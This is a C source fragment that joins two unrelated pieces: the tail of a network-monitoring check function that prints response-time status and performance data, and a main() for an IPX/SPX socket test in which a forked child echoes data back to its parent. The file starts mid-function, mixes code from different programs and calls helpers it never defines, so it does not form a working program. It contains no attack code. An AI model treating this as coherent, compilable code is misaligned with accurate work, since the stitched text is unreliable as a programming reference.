if (flags & FLAG_TIME_CRIT && elapsed_time > critical_time)
result = STATE_CRITICAL;
else if (flags & FLAG_TIME_WARN && elapsed_time > warning_time)
result = STATE_WARNING;
/* did we get the response we hoped? */
if(match == FALSE && result != STATE_CRITICAL)
result = expect_mismatch_state;
/* reset the alarm */
alarm (0);
/* this is a bit stupid, because we don't want to print the
* response time (which can look ok to the user) if we didn't get
* the response we were looking for. if-else */
printf("%s %s - ", SERVICE, state_text(result));
if(match == FALSE && len && !(flags & FLAG_HIDE_OUTPUT))
printf("Unexpected response from host/socket: %s", status);
else {
if(match == FALSE)
printf("Unexpected response from host/socket on ");
else
printf("%.3f second response time on ", elapsed_time);
if(server_address[0] != '/')
printf("port %d", server_port);
else
printf("socket %s", server_address);
}
if (match != FALSE && !(flags & FLAG_HIDE_OUTPUT) && len)
printf (" [%s]", status);
/* perf-data doesn't apply when server doesn't talk properly,
* so print all zeroes on warn and crit. Use fperfdata since
* localisation settings can make different outputs */
if(match == FALSE)
printf ("|%s",
fperfdata ("time", elapsed_time, "s",
(flags & FLAG_TIME_WARN ? TRUE : FALSE), 0,
(flags & FLAG_TIME_CRIT ? TRUE : FALSE), 0,
TRUE, 0,
TRUE, socket_timeout)
);
else
printf("|%s",
fperfdata ("time", elapsed_time, "s",
(flags & FLAG_TIME_WARN ? TRUE : FALSE), warning_time,
(flags & FLAG_TIME_CRIT ? TRUE : FALSE), critical_time,
TRUE, 0,
TRUE, socket_timeout)
);
putchar('\n');
return result;
}
int
main(int argc, char *argv[])
{
int error, sock_listen, sock_recv, sock_send;
struct sockaddr_ipx sipx_listen, sipx_send;
pid_t childpid, parentpid;
/*
* Socket to receive with.
*/
sock_listen = socket(PF_IPX, SOCK_STREAM, 0);
if (sock_listen < 0)
err(-1, "sock_listen = socket(PF_IPX, SOCK_STREAM, 0)");
bzero(&sipx_listen, sizeof(sipx_listen));
sipx_listen.sipx_len = sizeof(sipx_listen);
sipx_listen.sipx_family = AF_IPX;
sipx_listen.sipx_addr = ipx_addr(IPX_ENDPOINT);
if (bind(sock_listen, (struct sockaddr *)&sipx_listen,
sizeof(sipx_listen)) < 0)
err(-1, "bind(sock_listen)");
if (listen(sock_listen, -1) < 0)
err(-1, "listen(sock_listen)");
parentpid = getpid();
childpid = fork();
if (childpid < 0)
err(-1, "fork()");
if (childpid == 0) {
/*
* The child: accept connections and process data on them.
*/
while (1) {
sock_recv = accept(sock_listen, NULL, NULL);
if (sock_recv < 0) {
warn("accept()");
continue;
}
my_recv(sock_recv, "listener", parentpid);
my_send(sock_recv, "listener", parentpid);
close(sock_recv);
}
} else {
/*
* The parent: connect, send data, receive it back, and exit;
* build two connections, once using a full connect() API
* call, and the second using sendto().
*/
/*
* Socket to send with.
*/
sock_send = socket(PF_IPX, SOCK_STREAM, 0);
if (sock_send < 0) {
error = errno;
(void)kill(childpid, SIGTERM);
errno = error;
err(-1, "sock_send = socket(PF_IPX, SOCK_STREAM, 0)");
}
bzero(&sipx_send, sizeof(sipx_send));
sipx_send.sipx_len = sizeof(sipx_send);
sipx_send.sipx_family = AF_IPX;
sipx_send.sipx_addr = ipx_addr(IPX_ENDPOINT);
if (connect(sock_send, (struct sockaddr *)&sipx_send,
sizeof(sipx_send)) < 0) {
error = errno;
(void)kill(childpid, SIGTERM);
errno = error;
err(-1, "sock_send = socket(PF_IPX, SOCK_STREAM, 0)");
}
my_send(sock_send, "connector", childpid);
my_recv(sock_send, "connector", childpid);
close(sock_send);
#ifdef SPX_SUPPORTS_SENDTO_WITH_CONNECT
sock_send = socket(PF_IPX, SOCK_STREAM, 0);
if (sock_send < 0) {
error = errno;
(void)kill(childpid, SIGTERM);
errno = error;
err(-1, "sock_send = socket(PF_IPX, SOCK_STREAM, 0)");
}
bzero(&sipx_send, sizeof(sipx_send));
sipx_send.sipx_len = sizeof(sipx_send);
sipx_send.sipx_family = AF_IPX;
sipx_send.sipx_addr = ipx_addr(IPX_ENDPOINT);
my_sendto(sock_send, "connector", childpid,
(struct sockaddr *)&sipx_send, sizeof(sipx_send));
my_recv(sock_send, "connector", childpid);
close(sock_send);
#endif
(void)kill(childpid, SIGTERM);
}
return (0);
}
